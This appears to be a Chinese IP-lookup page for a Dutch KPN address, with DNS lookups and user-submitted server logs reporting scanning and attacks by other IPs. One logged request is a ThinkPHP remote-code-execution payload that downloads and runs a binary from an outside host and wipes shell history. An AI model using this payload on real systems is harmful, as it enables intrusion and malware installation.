必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): Amersfoort

省份(region): Provincie Utrecht

国家(country): Netherlands

运营商(isp): KPN

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 193.173.31.3
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7052
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;193.173.31.3.			IN	A

;; AUTHORITY SECTION:
.			556	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020090801 1800 900 604800 86400

;; Query time: 56 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Sep 09 07:50:31 CST 2020
;; MSG SIZE  rcvd: 116
HOST信息:
3.31.173.193.in-addr.arpa domain name pointer static.kpn.net.
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
3.31.173.193.in-addr.arpa	name = static.kpn.net.

Authoritative answers can be found from:
相关IP信息:
最新评论:
IP 类型 评论内容 时间
61.86.79.193 attack
61.86.79.193 - - [11/Apr/2019:07:03:06 +0800] "GET /index.php?s=/index/\\x09hink\\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.244.25.13
1/x86 -O .Akari; chmod +x .Akari; rm -rf .Akari x86; history -c -w;exit;logout;' HTTP/1.1" 400 182 "-" "Akari(selfrep)"
2019-04-11 07:13:26
42.56.30.66 attack
42.56.30.66 - - [09/Apr/2019:21:03:03 +0800] "GET /mgw.htm?operationType=com.cars.otsmobile.queryLeftTicket&requestData=%5B%7B\\x22train_date\\x22%3A\\x2220181231\\x22%2C\\x22purpose_codes\\x22%3A\\x2200\\x22%2C\\x22from_station\\x22%3A\\x22BJP\\x22%2C\\x22to_station\\x22%3A\\x22SHH\\x22%2C\\x22station_train_code\\x22%3A\\x22\\x22%2C\\x22start_time_begin\\x22%3A\\x220000\\x22%2C\\x22start_time_end\\x22%3A\\x222400\\x22%2C\\x22train_headers\\x22%3A\\x22QB%23\\x22%2C\\x22train_flag\\x22%3A\\x22\\x22%2C\\x22seat_type\\x22%3A\\x220\\x22%2C\\x22seatBack_Type\\x22%3A\\x22\\x22%2C\\x22ticket_num\\x22%3A\\x22\\x22%2C\\x22dfpStr\\x22%3A\\x22\\x22%2C\\x22baseDTO\\x22%3A%7B\\x22check_code\\x22%3A\\x22d38a201f2de926ce0686aedfdcf2de68\\x22%2C\\x22device_no\\x22%3A\\x22WtaHBzID7ZQDADJh05y5LLpd\\x22%2C\\x22mobile_no\\x22%3A\\x22\\x22%2C\\x22os_type\\x22%3A\\x22a\\x22%2C\\x22time_str\\x22%3A\\x2220181030152947\\x22%2C\\x22version_no\\x22%3A\\x224.1.9\\x22%7D%7D%5D&ts=1540884587652&sign=37b8ebe6406579e4fb2ac8c9038eab37 HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
2019-04-09 21:06:38
54.242.155.91 attack
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu"
54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET  HTTP/1.1" 400 182 "-" "-"
2019-04-14 19:37:25
35.229.108.3 bots
35.229.108.3 - - [09/Apr/2019:10:36:02 +0800] "GET /index.php/2019/04/09/vladimir_putin_2019_04_09_en/ HTTP/1.1" 200 13467 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0"
35.229.108.3 - - [09/Apr/2019:10:36:02 +0800] "GET /index.php/2019/04/09/apple_2019_04_09_en/ HTTP/1.1" 200 13979 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0"
35.229.108.3 - - [09/Apr/2019:10:36:02 +0800] "GET /index.php/2019/04/09/taylor_swift_2019_04_09_en/ HTTP/1.1" 200 13803 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0"
35.229.108.3 - - [09/Apr/2019:10:36:02 +0800] "GET /index.php/2019/04/09/google_2019_04_09_en/ HTTP/1.1" 200 15835 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0"
35.229.108.3 - - [09/Apr/2019:10:36:02 +0800] "GET /index.php/2019/04/09/uber_2019_04_09_en/ HTTP/1.1" 200 13643 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0"
2019-04-09 10:36:45
110.249.212.46 attack
110.249.212.46 - - [15/Apr/2019:10:15:42 +0800] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 182 "-" "-"
2019-04-15 10:17:39
203.240.222.13 attack
登录检测攻击
203.240.222.13 - - [18/Apr/2019:14:30:13 +0800] "GET /wp-login.php?action=register& HTTP/1.1" 404 209 "https://ipinfo.asytech.cn/" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17"
203.240.222.13 - - [18/Apr/2019:14:30:14 +0800] "GET /wp-login.php?action=register& HTTP/1.1" 404 209 "https://ipinfo.asytech.cn/wp-login.php?action=register&" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17"
2019-04-18 14:31:20
77.247.109.79 botsattack
77.247.109.79 - - [12/Apr/2019:14:11:58 +0800] "GET /admin/config.php HTTP/1.1" 404 232 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
77.247.109.79 - - [12/Apr/2019:14:11:59 +0800] "\\x16\\x03\\x01\\x00\\x90\\x01\\x00\\x00\\x8C\\x03\\x03g\\xC4\\x0C\\x1A\\xF7q|\\xEF\\x98\\xBC\\x1AO\\xC2!\\x14-\\xA3K\\x85\\xCD\\xA5aG\\xEF\\xD8\\xC3\\x99y:F|\\xBA\\x00\\x00.\\xC0+\\xC0/\\x00\\x9E\\x00\\x9C\\xC0" 400 182 "-" "-"
2019-04-12 14:16:02
185.93.3.129 bots
185.93.3.129 - - [13/Apr/2019:09:07:49 +0800] "GET /robots.txt HTTP/1.1" 200 292 "-" "Mozilla/5.0 (compatible; Cliqzbot/2.0; +http://cliqz.com/company/cliqzbot)"
185.93.3.129 - - [13/Apr/2019:09:07:51 +0800] "GET /check-ip/118.25.71.65 HTTP/1.1" 200 8968 "-" "Mozilla/5.0 (compatible; Cliqzbot/2.0; +http://cliqz.com/company/cliqzbot)"
2019-04-13 09:17:16
35.200.107.73 attack
35.200.107.73 - - [16/Apr/2019:21:17:31 +0800] "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
35.200.107.73 - - [16/Apr/2019:21:17:31 +0800] "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
35.200.107.73 - - [16/Apr/2019:21:17:31 +0800] "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
2019-04-16 21:34:35
122.228.19.80 attack
122.228.19.80 - - [09/Apr/2019:18:24:25 +0800] "GET /mahua/v/20190212/8dfcb2192a5052e5a152b9d8115201af_24f3fa0cbc00474fab1610181191b09c_0.m3u8 HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36"
122.228.19.80 - - [09/Apr/2019:18:24:25 +0800] "GET /mahua/v/20190212/8dfcb2192a5052e5a152b9d8115201af_24f3fa0cbc00474fab1610181191b09c_0.m3u8 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36"
2019-04-09 18:25:02
5.188.115.64 attack
端口扫描brute-force
2019-04-16 07:05:55
180.97.35.149 bots
不是正常流量
180.97.35.149 - - [09/Apr/2019:06:37:37 +0800] "GET / HTTP/1.1" 301 194 "http://www.baidu.com/s?wd=widetme" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
180.97.35.164 - - [09/Apr/2019:06:37:38 +0800] "GET / HTTP/1.1" 200 3259 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
180.97.35.164 - - [09/Apr/2019:06:37:38 +0800] "GET /static/bootstrap/css/bootstrap.min.css HTTP/1.1" 200 144877 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
2019-04-09 06:44:15
66.240.205.34 attack
66.240.205.34 - - [15/Apr/2019:16:54:43 +0800] "Gh0st\\xAD\\x00\\x00\\x00\\xE0\\x00\\x00\\x00x\\x9CKS``\\x98\\xC3\\xC0\\xC0\\xC0\\x06\\xC4\\x8C@\\xBCQ\\x96\\x81\\x81\\x09H\\x07\\xA7\\x16\\x95e&\\xA7*\\x04$&g+\\x182\\x94\\xF6\\xB000\\xAC\\xA8rc\\x00\\x01\\x11\\xA0\\x82\\x1F\\x5C`&\\x83\\xC7K7\\x86\\x19\\xE5n\\x0C9\\x95n\\x0C;\\x84\\x0F3\\xAC\\xE8sch\\xA8^\\xCF4'J\\x97\\xA9\\x82\\xE30\\xC3\\x91h]&\\x90\\xF8\\xCE\\x97S\\xCBA4L?2=\\xE1\\xC4\\x92\\x86\\x0B@\\xF5`\\x0CT\\x1F\\xAE\\xAF]" 400 182 "-" "-"
2019-04-15 16:55:20
89.248.172.90 proxy
89.248.172.90 - - [17/Apr/2019:14:10:41 +0800] "CONNECT dnspod.qcloud.com:443 HTTP/1.1" 405 519 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)"
2019-04-17 15:15:55
5.188.210.101 botsattack
5.188.210.101 - - [16/Apr/2019:16:54:38 +0800] "GET http://5.188.210.101/echo.php HTTP/1.1" 404 465 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
2019-04-16 16:55:07

最近上报的IP列表

101.174.109.234 126.198.203.205 93.218.134.84 117.89.134.185
129.242.152.183 174.4.142.194 154.225.129.49 190.163.15.32
153.180.79.1 97.242.191.135 65.236.175.50 78.208.169.183
148.215.115.104 73.46.245.140 2.206.229.192 70.49.252.255
187.80.16.14 98.237.87.136 91.27.219.249 172.52.155.46